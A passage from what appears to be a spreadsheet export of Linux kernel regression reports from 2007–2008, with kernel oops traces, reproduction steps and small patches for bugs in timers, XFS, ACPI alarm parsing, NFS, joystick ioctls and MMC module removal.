CONFIG_USB_DSBR=m CONFIG_DVB_CORE=m CONFIG_DVB_CAPTURE_DRIVERS=y CONFIG_DVB_TTUSB_DEC=m CONFIG_DVB_CINERGYT2=m CONFIG_DAB=y CONFIG_BACKLIGHT_LCD_SUPPORT=y CONFIG_BACKLIGHT_CLASS_DEVICE=y CONFIG_VIDEO_OUTPUT_CONTROL=m CONFIG_FB=y CONFIG_FIRMWARE_EDID=y CONFIG_FB_CFB_FILLRECT=y CONFIG_FB_CFB_COPYAREA=y CONFIG_FB_CFB_IMAGEBLIT=y CONFIG_FB_DEFERRED_IO=y CONFIG_FB_MODE_HELPERS=y CONFIG_FB_VESA=y CONFIG_VGA_CONSOLE=y CONFIG_VIDEO_SELECT=y CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE_ROTATION=y CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y CONFIG_SOUND=y CONFIG_SND=y CONFIG_SND_TIMER=y CONFIG_SND_PCM=y CONFIG_SND_HWDEP=m CONFIG_SND_RAWMIDI=m CONFIG_SND_SEQUENCER=y CONFIG_SND_SEQ_DUMMY=y CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_PCM_OSS_PLUGINS=y CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=m CONFIG_SND_SEQ_RTCTIMER_DEFAULT=y CONFIG_SND_VX_LIB=m CONFIG_SND_HDA_INTEL=y CONFIG_SND_USB_AUDIO=m CONFIG_SND_USB_USX2Y=m CONFIG_SND_USB_CAIAQ=m CONFIG_SND_VXPOCKET=m CONFIG_SND_PDAUDIOCF=m CONFIG_HID_SUPPORT=y CONFIG_HID=y CONFIG_USB_HID=y CONFIG_USB_HIDDEV=y CONFIG_USB_SUPPORT=y CONFIG_USB_ARCH_HAS_HCD=y CONFIG_USB_ARCH_HAS_OHCI=y CONFIG_USB_ARCH_HAS_EHCI=y CONFIG_USB=y CONFIG_USB_DEVICEFS=y CONFIG_USB_DEVICE_CLASS=y CONFIG_USB_SUSPEND=y CONFIG_USB_EHCI_HCD=y CONFIG_USB_EHCI_SPLIT_ISO=y CONFIG_USB_EHCI_ROOT_HUB_TT=y CONFIG_USB_UHCI_HCD=y CONFIG_USB_ACM=m CONFIG_USB_PRINTER=m CONFIG_USB_STORAGE=y CONFIG_USB_STORAGE_DATAFAB=y CONFIG_USB_STORAGE_FREECOM=y CONFIG_USB_STORAGE_ISD200=y CONFIG_USB_STORAGE_DPCM=y CONFIG_USB_STORAGE_USBAT=y CONFIG_USB_STORAGE_SDDR09=y CONFIG_USB_STORAGE_SDDR55=y CONFIG_USB_STORAGE_JUMPSHOT=y CONFIG_USB_STORAGE_ALAUDA=y CONFIG_USB_MICROTEK=m CONFIG_USB_MON=y CONFIG_USB_USS720=m CONFIG_USB_SERIAL=m CONFIG_USB_SERIAL_GENERIC=y CONFIG_USB_SERIAL_AIRPRIME=m CONFIG_USB_SERIAL_ARK3116=m CONFIG_USB_SERIAL_BELKIN=m CONFIG_USB_SERIAL_DIGI_ACCELEPORT=m CONFIG_USB_SERIAL_CP2101=m CONFIG_USB_SERIAL_CYPRESS_M8=m CONFIG_USB_SERIAL_EMPEG=m CONFIG_USB_SERIAL_FTDI_SIO=m CONFIG_USB_SERIAL_FUNSOFT=m CONFIG_USB_SERIAL_VISOR=m CONFIG_USB_SERIAL_IPAQ=m CONFIG_USB_SERIAL_IR=m CONFIG_USB_SERIAL_EDGEPORT=m CONFIG_USB_SERIAL_EDGEPORT_TI=m CONFIG_USB_SERIAL_GARMIN=m CONFIG_USB_SERIAL_IPW=m CONFIG_USB_SERIAL_KEYSPAN_PDA=m CONFIG_USB_SERIAL_KLSI=m CONFIG_USB_SERIAL_KOBIL_SCT=m CONFIG_USB_SERIAL_MCT_U232=m CONFIG_USB_SERIAL_NAVMAN=m CONFIG_USB_SERIAL_PL2303=m CONFIG_USB_SERIAL_HP4X=m CONFIG_USB_SERIAL_SAFE=m CONFIG_USB_SERIAL_SIERRAWIRELESS=m CONFIG_USB_SERIAL_TI=m CONFIG_USB_SERIAL_CYBERJACK=m CONFIG_USB_SERIAL_XIRCOM</t>
  </si>
  <si>
    <t>kernel BUG at kernel/timer.c:606</t>
  </si>
  <si>
    <t>2007-12-25 01:20 UTC</t>
  </si>
  <si>
    <t>2008-01-28 22:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.20+ Distribution: Gentoo Hardware Environment: 8 Different PC Software Environment: ? Problem Description: Catched by netconsole: [91922.085864] ------------[ cut here ]------------ [91922.085975] kernel BUG at kernel/timer.c:606! [91922.086058] invalid opcode: 0000 [#1] [91922.086127] SMP [91922.086201] Modules linked in: netconsole cls_u32 sch_sfq sch_htb xt_tcpudp iptable_filter ip_tables x_tables i2c_i801 i2c_core [91922.086386] CPU: 1 [91922.086387] EIP: 0060:[&lt;c0127387&gt;] Not tainted VLI [91922.086389] EFLAGS: 00010087 (2.6.23-gentoo-r4-fw #4) [91922.086600] EIP is at cascade+0x34/0x4f [91922.086669] eax: c0452200 ebx: f450408c ecx: 00000022 edx: f3c6e08c [91922.086740] esi: 00000022 edi: c21ce000 ebp: 00000001 esp: c21c3ef8 [91922.086815] ds: 007b es: 007b fs: 00d8 gs: 0000 ss: 0068 [91922.086885] Process swapper (pid: 0, ti=c21c2000 task=c21af000 task.ti=c21c2000) [91922.086954] Stack: f3c6e08c c21bfb74 00000000 c21ce000 0000000a c012767a c21af000 00000001 [91922.087119] c21c3f18 c0106963 c21c3f68 00000001 00000021 c03c0b08 0000000a c0124556 [91922.087285] 00000046 00000000 c21c2008 00000000 c01245ec c2015120 c0114a11 00000046 [91922.087451] Call Trace: [91922.087586] [&lt;c012767a&gt;] run_timer_softirq+0x51/0x154 [91922.087669] [&lt;c0106963&gt;] profile_pc+0x21/0x46 [91922.087752] [&lt;c0124556&gt;] __do_softirq+0x5d/0xc1 [91922.087833] [&lt;c01245ec&gt;] do_softirq+0x32/0x36 [91922.087915] [&lt;c0114a11&gt;] smp_apic_timer_interrupt+0x74/0x80 [91922.087997] [&lt;c010484c&gt;] apic_timer_interrupt+0x28/0x30 [91922.088076] [&lt;c0102255&gt;] mwait_idle_with_hints+0x3b/0x3f [91922.088162] [&lt;c0102259&gt;] mwait_idle+0x0/0xa [91922.088237] [&lt;c0102398&gt;] cpu_idle+0x91/0xaa [91922.088319] ======================= [91922.088390] Code: 08 8d 04 ca 8b 10 89 62 04 89 14 24 8b 50 04 89 22 89 00 89 54 24 04 8b 14 24 89 40 04 8b 1a eb 19 8b 42 14 83 e0 fe 39 f8 74 04 &lt;0f&gt; 0b eb fe 89 f8 e8 d8 fe ff ff 89 da 8b 1b 39 e2 75 e3 59 89 [91922.088864] EIP: [&lt;c0127387&gt;] cascade+0x34/0x4f SS:ESP 0068:c21c3ef8 Steps to reproduce: Random. 1-3 times in week . I do every hour echo START &gt;&gt; log.txt iptables-restore &lt; xxx.txt tc qdisc del dev eth0 root tc qdisc del dev eth1 root tc -b new_rules.txt echo END &gt;&gt; log.txt Bug always be between START and END</t>
  </si>
  <si>
    <t>Unaligned accesses in xfs_file_readdir</t>
  </si>
  <si>
    <t>2007-12-25 17:47 UTC</t>
  </si>
  <si>
    <t>2008-01-11 12:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23 Distribution: Debian/lenny Hardware Environment: API CS20D (2 x 833Mhz EV68AL Alpha CPUs) Software Environment: Linux sky 2.6.24-rc6-mm1 #1 SMP Mon Dec 24 00:24:38 CST 2007 alpha GNU/Linux Gnu C 4.2.3 Gnu make 3.81 binutils 2.18.20071027 util-linux 2.13 mount 2.13 module-init-tools 3.3-pre11 e2fsprogs 1.40.2 xfsprogs 2.9.4 Linux C Library 2.7 Dynamic linker (ldd) 2.7 Procps 3.2.7 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.97 udev 114 Modules Loaded xt_multiport xt_state ip6table_mangle ip6table_filter ip6_tables iptable_mangle iptable_filter adm9240 hwmon_vid loop i2c_ali1535 i2c_ali15x3 i2c_core sd_mod ide_cd_mod cdrom generic sym53c8xx e100 scsi_transport_spi alim15x3 mii scsi_mod ide_core (Note: -mm1 compile, however bug was introduced in 2.6.24-rc6 patch, not -mm1) Problem Description: kernel unaligned acc : 270990 (pc=fffffc00011855f4,va=fffffc007e39204b) From System.map: fffffc0001185480 t xfs_file_readdir fffffc0001185650 t xfs_hack_filldir Steps to reproduce: Boot. ls a directory on a XFS filesystem. Seems to be caused by the major xfs_file.c changes in the 2.6.24-rc6 patch.</t>
  </si>
  <si>
    <t>kexec userspace utilities cannot handle a kernel command line longer than 256 chars</t>
  </si>
  <si>
    <t>2007-12-26 16:26 UTC</t>
  </si>
  <si>
    <t>Friedrich Oslage</t>
  </si>
  <si>
    <t>2008-03-05 05:22 UTC</t>
  </si>
  <si>
    <t>This doesn't affect the kernel but the userspace utilities from http://www.kernel.org/pub/linux/kernel/people/horms/kexec-tools/ Since 2.6.21 the maximum length of the kernel command line is 2048 for x86 and x86_64 but the kexec-tools still assume it's 256 therefore a command line longer than 256 chars is truncated upon kexec-reboot. Steps to reproduce: - Boot kernel with a command line longer than 256 chars - cat /proc/cmdline | wc -c - kexec-reboot - cat /proc/cmdline | wc -c</t>
  </si>
  <si>
    <t>/proc/acpi/alarm set error</t>
  </si>
  <si>
    <t>2007-12-26 22:06 UTC</t>
  </si>
  <si>
    <t>Yi Yang</t>
  </si>
  <si>
    <t>2008-02-10 14:44 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Distribution: FC8 Hardware Environment: All Software Environment: All Problem Description: after echo "2007 12" &gt; /proc/acpi/alarm, you'll get 2007-12-12 12:12:12 by cat /proc/acpi/alarm, obviously it is wrong, it should consider "2007 12" as an invalid input. Steps to reproduce: [root@localhost /]# echo "2006 09" &gt; /proc/acpi/alarm [root@localhost /]# cat /proc/acpi/alarm 2007-12-09 09:09:09 [root@localhost /]# echo "2006 04" &gt; /proc/acpi/alarm [root@localhost /]# cat /proc/acpi/alarm 2007-12-04 04:04:04</t>
  </si>
  <si>
    <t>Superfulous counting and counting error in function acpi_system_write_alarm</t>
  </si>
  <si>
    <t>2007-12-27 00:17 UTC</t>
  </si>
  <si>
    <t>2008-02-10 14:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Distribution: FC8 Hardware Environment: All Software Environment: All Problem Description: In function acpi_system_write_alarm in file drivers/acpi/sleep/proc.c, big sec, min, hr, mo, day and yr are counted twice to get reasonable values, that is very superfluous, we can do that only once. In additon, /proc/acpi/alarm can set a related value which can be specified as YYYY years MM months DD days HH hours MM minutes SS senconds, it isn't a date, so you can specify as +0000-00-00 96:00:00 , that means 3 days later, current code can't handle such a case. Steps to reproduce: [root@localhost ~]# echo "2007-12-00 00:00:00" &gt; /proc/acpi/alarm [root@localhost ~]# cat /proc/acpi/alarm 2007-12-00 00:00:00 [root@localhost /]# echo "0000-00-00 96:180:180" &gt; /proc/acpi/alarm [root@localhost /]# cat /proc/acpi/alarm 0007-12-02 **:**:** [root@localhost /]#</t>
  </si>
  <si>
    <t>Kernel panic - not syncing</t>
  </si>
  <si>
    <t>2.6.24-rc6-mm1</t>
  </si>
  <si>
    <t>2007-12-27 10:26 UTC</t>
  </si>
  <si>
    <t>Zdenek Stryhal</t>
  </si>
  <si>
    <t>2008-12-01 10:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.20-mm2 Distribution:gentoo Hardware Environment: Software Environment: I have reiser4 filesystem on 9 partitions, including "/" partition Problem Description: System hangs on halt or reboot with message: reiser4 panicked cowardly : reiser4[umount(6567)] : commit_current_atom (fs/reiser4/txmngr.c:1087) [zam-597] Kernel panic - not syncing: reiser4[umount(6567)] : commit_current_atom (fs/reiser4/txmngr.c:1087) [zam-597] Everithing else seems to work fine. Steps to reproduce: halt or reboot system running on 2.6.24* kernel</t>
  </si>
  <si>
    <t>NULL dereference in fs/nfs/super.c:nfs_xdev_get_sb()</t>
  </si>
  <si>
    <t>2007-12-27 12:36 UTC</t>
  </si>
  <si>
    <t>2008-01-03 13:13 UTC</t>
  </si>
  <si>
    <t>The Coverity checker spotted that commit 4584f520e1f773082ef44ff4f8969a5d992b16ec introduced the following NULL dereference in 2.6.24-rc6: &lt;-- snip --&gt; ... static int nfs_xdev_get_sb(struct file_system_type *fs_type, int flags, const char *dev_name, void *raw_data, struct vfsmount *mnt) { ... if (s-&gt;s_fs_info != server) { nfs_free_server(server); server = NULL; &lt;--------------- } if (!s-&gt;s_root) { /* initial superblock/root creation */ nfs_clone_super(s, data-&gt;sb); } mntroot = nfs_get_root(s, data-&gt;fh); if (IS_ERR(mntroot)) { error = PTR_ERR(mntroot); goto error_splat_super; } if (mntroot-&gt;d_inode-&gt;i_op != server-&gt;nfs_client-&gt;rpc_ops-&gt;dir_inode_ops) { ... &lt;-- snip --&gt;</t>
  </si>
  <si>
    <t>joystick not working with 32 bit applications running on x86-64</t>
  </si>
  <si>
    <t>2007-12-28 08:55 UTC</t>
  </si>
  <si>
    <t>Akos Maroy</t>
  </si>
  <si>
    <t>2008-09-13 01:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22 Distribution: Gentoo Hardware Environment: Intel Core Duo 2 Software Environment: 32 bit applications running on a 64-bit platform Problem Description: unfortunately 32 bit apps don't see the joysticks on a 64 bit system. this prevents one playing X-Plane (http://www.x-plane.com/) or other 32-bit games with joysticks. this is a know issue, and already raised several times: http://readlist.com/lists/vger.kernel.org/linux-kernel/28/144411.html http://www.brettcsmith.org/wiki/wiki.cgi?action=browse&amp;diff=1&amp;id=OzyComputer/Joystick unfortunately this is still not fixed in the mainline kerne Steps to reproduce: fire up a 32-bit application that uses joystick on a 64-bit system, like X-Plane, and see the joysticks not recognized the following patch solves the problem: diff -Naur linux-2.6.22-suspend2-r2/fs/compat_ioctl.c linux-2.6.22-suspend2-r2-joystick/fs/compat_ioctl.c --- linux-2.6.22-suspend2-r2/fs/compat_ioctl.c 2007-12-22 14:08:14.000000000 +0100 +++ linux-2.6.22-suspend2-r2-joystick/fs/compat_ioctl.c 2007-12-22 14:07:54.000000000 +0100 @@ -10,6 +10,8 @@ * ioctls. */ +#include &lt;linux/joystick.h&gt; + #include &lt;linux/types.h&gt; #include &lt;linux/compat.h&gt; #include &lt;linux/kernel.h&gt; @@ -3259,6 +3261,12 @@ COMPATIBLE_IOCTL(VIDEO_GET_SIZE) COMPATIBLE_IOCTL(VIDEO_GET_FRAME_RATE) +/* joystick */ +COMPATIBLE_IOCTL(JSIOCGVERSION) +COMPATIBLE_IOCTL(JSIOCGAXES) +COMPATIBLE_IOCTL(JSIOCGBUTTONS) +COMPATIBLE_IOCTL(JSIOCGNAME(0x200)) /* for X-Plane 8.03 */ + /* now things that need handlers */ HANDLE_IOCTL(MEMREADOOB32, mtd_rw_oob) HANDLE_IOCTL(MEMWRITEOOB32, mtd_rw_oob)</t>
  </si>
  <si>
    <t>restore ARMv6 OProfile support</t>
  </si>
  <si>
    <t>2007-12-28 11:39 UTC</t>
  </si>
  <si>
    <t>2008-01-15 12:28 UTC</t>
  </si>
  <si>
    <t>linux-arm-kernel@lists.arm.linux.org.uk</t>
  </si>
  <si>
    <t>Subject : restore ARMv6 OProfile support Submitter : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; References : http://lkml.org/lkml/2007/12/28/99 Handled-By : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; Patch : http://lkml.org/lkml/2007/12/28/99</t>
  </si>
  <si>
    <t>restore blackfin HARDWARE_PM support</t>
  </si>
  <si>
    <t>2007-12-28 11:40 UTC</t>
  </si>
  <si>
    <t>2008-01-15 13:33 UTC</t>
  </si>
  <si>
    <t>Subject : restore blackfin HARDWARE_PM support Submitter : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; References : http://lkml.org/lkml/2007/12/28/100 Handled-By : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; Patch : http://lkml.org/lkml/2007/12/28/100</t>
  </si>
  <si>
    <t>IWL3945 generates WARNING in mac80211/rx.c code</t>
  </si>
  <si>
    <t>2007-12-28 12:58 UTC</t>
  </si>
  <si>
    <t>2008-02-04 22:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.24-rc6 Distribution: fedora rawhide Hardware Environment: T61 Software Environment: Problem Description: Warning appears in the log when NetworkManager tries to initialize wifi - driver works normally NetworkManager: &lt;info&gt; (eth0) supplicant interface is now in state 1 (from 0). NetworkManager: &lt;info&gt; (wlan0) supplicant manager is now in state 1 (from 0). NetworkManager: &lt;info&gt; (eth0) supplicant interface is now in state 2 (from 1). NetworkManager: &lt;info&gt; (wlan0) supplicant interface is now in state 2 (from 1). WARNING: at net/mac80211/rx.c:1486 __ieee80211_rx() Pid: 0, comm: swapper Not tainted 2.6.24-rc6 #8 Call Trace: &lt;IRQ&gt; [&lt;ffffffff88123d89&gt;] :mac80211:__ieee80211_rx+0xc69/0xd30 [&lt;ffffffff812abd86&gt;] _spin_lock_irqsave+0x26/0xa0 [&lt;ffffffff812ac3a5&gt;] _spin_unlock_irqrestore+0x15/0x30 [&lt;ffffffff8815af91&gt;] :iwl3945:iwl_rx_queue_restock+0xd1/0x160 [&lt;ffffffff812abd86&gt;] _spin_lock_irqsave+0x26/0xa0 [&lt;ffffffff88114f7b&gt;] :mac80211:ieee80211_tasklet_handler+0xbb/0x120 [&lt;ffffffff810420a7&gt;] tasklet_action+0x47/0xb0 [&lt;ffffffff81041fb9&gt;] __do_softirq+0x59/0xd0 [&lt;ffffffff8100d5dc&gt;] call_softirq+0x1c/0x30 [&lt;ffffffff8100f975&gt;] do_softirq+0x35/0x90 [&lt;ffffffff81041ee5&gt;] irq_exit+0x85/0x90 [&lt;ffffffff8100fa54&gt;] do_IRQ+0x84/0x100 [&lt;ffffffff8100c931&gt;] ret_from_intr+0x0/0xa &lt;EOI&gt; [&lt;ffffffff811a312f&gt;] acpi_idle_enter_bm+0x272/0x2de [&lt;ffffffff811a3125&gt;] acpi_idle_enter_bm+0x268/0x2de [&lt;ffffffff81230357&gt;] cpuidle_idle_call+0x97/0xd0 [&lt;ffffffff812302c0&gt;] cpuidle_idle_call+0x0/0xd0 [&lt;ffffffff8100b001&gt;] cpu_idle+0x71/0xe0 Steps to reproduce:</t>
  </si>
  <si>
    <t>Booting from nfsroot fails</t>
  </si>
  <si>
    <t>2.6.24-rc6-git4</t>
  </si>
  <si>
    <t>2007-12-29 11:54 UTC</t>
  </si>
  <si>
    <t>2008-01-11 18:58 UTC</t>
  </si>
  <si>
    <t>Horms</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.24-rc6-git3 Distribution: Debian GNU Linux 4.0/Etch Hardware Environment: Intel DG965SS, 4GB RAM, onboard e1000, no HDD Software Environment: Debian GNU Linux 4.0r2 x86_64 Problem Description: Starting with -git4 release the System won't boot from network. Booting with root=/dev/nfs ip=dhcp for example ends in asking the user to insert a boot floppy. This is obviously not the expected result when booting from network. The cause seem to be the changeset a6c05c3d064dbb83be88cba3189beb5db9d2dfc3. Looking at the code I found that ic_enable doesn't get set as expected. This prevents the kernel from initializing the ip configuration. The patch &amp; my LK conf (for reference) are attached. This may be not the ideal way of solving this, there are probably better ones. This one "Works For Me" :)</t>
  </si>
  <si>
    <t>Enable DMI quirks on x86-64</t>
  </si>
  <si>
    <t>2007-12-29 17:11 UTC</t>
  </si>
  <si>
    <t>2008-02-06 14:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18 Something changed in i8042_check_aux which meant that my synaptics touchpad was no longer detected because it doesn't reply to the loop command. There is an entry for it in the dmi noloop table in i8042-x86ia64io.h but the whole thing is enclosed in an ifdef __i386__. The same problem happens on x86-64 so I wrote and tested a patch to enable the dmi check on 64-bit as well. Bruce</t>
  </si>
  <si>
    <t>powerpc/platforms/cell/spufs/: multiple definition of `notify_spus_active'</t>
  </si>
  <si>
    <t>Current -git (e697789d)</t>
  </si>
  <si>
    <t>2007-12-31 10:52 UTC</t>
  </si>
  <si>
    <t>2008-01-02 04:27 UTC</t>
  </si>
  <si>
    <t>Jeremy Kerr</t>
  </si>
  <si>
    <t>Commit aed3a8c9bb1a8623a618232087c5ff62718e3b9a causes the following build error: &lt;-- snip --&gt; ... LD arch/powerpc/platforms/cell/built-in.o arch/powerpc/platforms/cell/spufs/built-in.o: In function `.notify_spus_active': (.text+0xa25c): multiple definition of `.notify_spus_active' arch/powerpc/platforms/cell/spu_syscalls.o:(.text+0x0): first defined here arch/powerpc/platforms/cell/spufs/built-in.o: In function `notify_spus_active': (.opd+0x1038): multiple definition of `notify_spus_active' arch/powerpc/platforms/cell/spu_syscalls.o:(.opd+0x0): first defined here make[3]: *** [arch/powerpc/platforms/cell/built-in.o] Error 1 &lt;-- snip --&gt;</t>
  </si>
  <si>
    <t>lockdep warning with LTP dio test (v2.6.24-rc6-125-g5356f66)</t>
  </si>
  <si>
    <t>2.6.24-rc6-125-g5356f66</t>
  </si>
  <si>
    <t>2008-01-01 11:06 UTC</t>
  </si>
  <si>
    <t>2009-03-23 09:21 UTC</t>
  </si>
  <si>
    <t>Subject : lockdep warning with LTP dio test (v2.6.24-rc6-125-g5356f66) Submitter : Erez Zadok &lt;ezk@cs.sunysb.edu&gt; Date : 2007-12-24 18:02 References : http://lkml.org/lkml/2007/12/24/107</t>
  </si>
  <si>
    <t>IDE/ACPI related hibernation regression: Second attempt fails</t>
  </si>
  <si>
    <t>commit 5e32132befa5d2cefadf3141fee0bbb40cd11f0e</t>
  </si>
  <si>
    <t>2008-01-01 12:04 UTC</t>
  </si>
  <si>
    <t>2008-01-11 08:24 UTC</t>
  </si>
  <si>
    <t>Subject : IDE/ACPI related hibernation regression: Second attempt fails Submitter : Mikko Vinni &lt;mmvinni@yahoo.com&gt; Date : 2007-12-31 13:27 References : http://lkml.org/lkml/2007/12/31/135 Handled-By : Andreas Mohr &lt;andi@lisas.de&gt; Caused by: commit 5e32132befa5d2cefadf3141fee0bbb40cd11f0e Author: Shaohua Li &lt;shaohua.li@intel.com&gt; Date: Thu Oct 11 23:53:58 2007 +0200 ide: hook ACPI _PSx method to IDE power on/off http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=5e32132befa5d2cefadf3141fee0bbb40cd11f0e</t>
  </si>
  <si>
    <t>Oops during rmmod'ing modeuls sdhci, sr_mod, ricoh_mmc, mmc_core</t>
  </si>
  <si>
    <t>2.6.24-rc6-git7</t>
  </si>
  <si>
    <t>2008-01-01 14:55 UTC</t>
  </si>
  <si>
    <t>2008-01-03 14:59 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: x86_64 Software Environment: GNU Problem Description: Oops during removing some MMC modules. MMC controller was automatically detected and its module loaded (with several dependencies) on my laptop. I don't use it for now - so started to remove the modules. Here were the exact commands: # rmmod sdhci (sorry, don't have `lsmod` before all this. but 'sdhci' was just above 'sr_mod' module in the list) # lsmod Module Size Used by iwl3945 176904 0 tcp_westwood 3136 0 ipt_REJECT 4224 7 xt_state 2560 1 iptable_filter 3072 1 ipt_owner 2176 2 ipt_MASQUERADE 3520 1 xt_tcpudp 3648 17 xt_multiport 3584 4 iptable_nat 6340 1 nf_nat 19628 2 ipt_MASQUERADE,iptable_nat nf_conntrack_ipv4 16144 3 iptable_nat nf_conntrack 66032 5 xt_state,ipt_MASQUERADE,iptable_nat,nf_nat,nf_conntrack_ipv4 ip_tables 19064 2 iptable_filter,iptable_nat x_tables 16992 8 ipt_REJECT,xt_state,ipt_owner,ipt_MASQUERADE,xt_tcpudp,xt_multiport,iptable_nat,ip_tables sr_mod 16740 0 ricoh_mmc 3776 0 mmc_core 51424 0 cdrom 37288 1 sr_mod # rmmod sr_mod ricoh_mmc mmc_core and here came the Oops. Here is dmesg: ------------CUT------------ [ 40.137967] ricoh-mmc: Controller is now re-enabled. [ 40.158455] Unable to handle kernel paging request at ffffffff8804cc80 RIP: [ 40.158460] [&lt;ffffffff8804cc80&gt;] [ 40.158464] PGD 203067 PUD 207063 PMD 3dca9067 PTE 0 [ 40.158468] Oops: 0010 [1] PREEMPT SMP [ 40.158472] CPU 1 [ 40.158473] Modules linked in: sr_mod iwl3945 tcp_westwood ipt_REJECT xt_state iptable_filter ipt_owner ipt_MASQUERADE xt_tcpudp xt_multiport iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack ip_tables x_tables cdrom [ 40.158488] Pid: 8008, comm: modprobe Not tainted 2.6.24-rc6-git7 #3 [ 40.158490] RIP: 0010:[&lt;ffffffff8804cc80&gt;] [&lt;ffffffff8804cc80&gt;] [ 40.158493] RSP: 0000:ffff81003df37a40 EFLAGS: 00010082 [ 40.158494] RAX: ffffffff8804cc80 RBX: ffff81003f13a7e0 RCX: 0000000000000000 [ 40.158496] RDX: 0000000000000000 RSI: ffff810029634360 RDI: ffff81003f13a7e0 [ 40.158498] RBP: ffff810029634360 R08: 0000000000000000 R09: 0000000000000001 [ 40.158500] R10: ffffffff8058bba0 R11: ffffffff803f7f40 R12: ffff81003df37a50 [ 40.158502] R13: ffffffff00000010 R14: 0000000100000010 R15: ffff81003f023878 [ 40.158505] FS: 00002b3efdc88b00(0000) GS:ffff81003f00c580(0000) knlGS:0000000000000000 [ 40.158507] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 40.158509] CR2: ffffffff8804cc80 CR3: 000000003d3a4000 CR4: 00000000000006a0 [ 40.158511] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 40.158513] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 40.158515] Process modprobe (pid: 8008, threadinfo ffff81003df36000, task ffff81003ddc2000) [ 40.158517] Stack: ffffffff80331800 ffff81003f13a7e0 ffff810029634360 0000000000000001 [ 40.158522] ffff81003f023800 ffff81003f224000 ffff81003f13a7e0 0000000000000000 [ 40.158526] ffffffff803f7fa9 ffff810029634360 ffff81003f023b38 ffff81003f023968 [ 40.158530] Call Trace: [ 40.158537] [&lt;ffffffff80331800&gt;] elv_next_request+0xe0/0x170 [ 40.158543] [&lt;ffffffff803f7fa9&gt;] scsi_request_fn+0x69/0x360 [ 40.158547] [&lt;ffffffff803352a2&gt;] blk_execute_rq_nowait+0x62/0xb0 [ 40.158551] [&lt;ffffffff80336d6a&gt;] blk_execute_rq+0x8a/0x100 [ 40.158553] [&lt;ffffffff803347e5&gt;] get_request+0x155/0x2d0 [ 40.158557] [&lt;ffffffff803f7d64&gt;] scsi_execute+0xe4/0x120 [ 40.158560] [&lt;ffffffff803f7e31&gt;] scsi_execute_req+0x91/0x100 [ 40.158565] [&lt;ffffffff8800b70b&gt;] :sr_mod:sr_probe+0x21b/0x630 [ 40.158570] [&lt;ffffffff802fa0a9&gt;] sysfs_create_link+0xa9/0x150 [ 40.158575] [&lt;ffffffff805620a5&gt;] klist_next+0x35/0xe0 [ 40.158579] [&lt;ffffffff803c34cc&gt;] driver_probe_device+0x9c/0x1b0 [ 40.158582] [&lt;ffffffff803c37b1&gt;] __driver_attach+0xe1/0xf0 [ 40.158585] [&lt;ffffffff803c36d0&gt;] __driver_attach+0x0/0xf0 [ 40.158589] [&lt;ffffffff803c26bd&gt;] bus_for_each_dev+0x4d/0x80 [ 40.158592] [&lt;ffffffff803c2acf&gt;] bus_add_driver+0xaf/0x220 [ 40.158596] [&lt;ffffffff8801102c&gt;] :sr_mod:init_sr+0x2c/0x47 [ 40.158601] [&lt;ffffffff80267856&gt;] sys_init_module+0x196/0x1a20 [ 40.158607] [&lt;ffffffff8020bdee&gt;] system_call+0x7e/0x83 [ 40.158609] [ 40.158610] [ 40.158611] Code: Bad RIP value. [ 40.158615] RIP [&lt;ffffffff8804cc80&gt;] [ 40.158617] RSP &lt;ffff81003df37a40&gt; [ 40.158618] CR2: ffffffff8804cc80 [ 40.158622] ---[ end trace 105b7f7d35157dd9 ]--- [ 40.158624] note: modprobe[8008] exited with preempt_count 1 [ 40.158627] BUG: sleeping function called from invalid context at kernel/rwsem.c:21 [ 40.158629] in_atomic():1, irqs_disabled():0 [ 40.158631] INFO: lockdep is turned off. [ 40.158632] Pid: 8008, comm: modprobe Tainted: G D 2.6.24-rc6-git7 #3 [ 40.158634] [ 40.158634] Call Trace: [ 40.158638] [&lt;ffffffff805655c5&gt;] down_read+0x15/0x40 [ 40.158641] [&lt;ffffffff8023c73b&gt;] exit_mm+0x2b/0x110 [ 40.158644] [&lt;ffffffff8023e1af&gt;] do_exit+0x1af/0x900 [ 40.158649] [&lt;ffffffff80226659&gt;] do_page_fault+0x539/0x7c0 [ 40.158653] [&lt;ffffffff80342d01&gt;] __up_read+0x21/0xb0 [ 40.158656] [&lt;ffffffff80342d01&gt;] __up_read+0x21/0xb0 [ 40.158660] [&lt;ffffffff802964c9&gt;] handle_mm_fault+0x1c9/0x840 [ 40.158663] [&lt;ffffffff8028b19c&gt;] get_page_from_freelist+0x35c/0x570 [ 40.158667] [&lt;ffffffff805670fd&gt;] error_exit+0x0/0xa9 [ 40.158670] [&lt;ffffffff803f7f40&gt;] scsi_request_fn+0x0/0x360 [ 40.158674] [&lt;ffffffff80331800&gt;] elv_next_request+0xe0/0x170 [ 40.158677] [&lt;ffffffff803f7fa9&gt;] scsi_request_fn+0x69/0x360 [ 40.158680] [&lt;ffffffff803352a2&gt;] blk_execute_rq_nowait+0x62/0xb0 [ 40.158683] 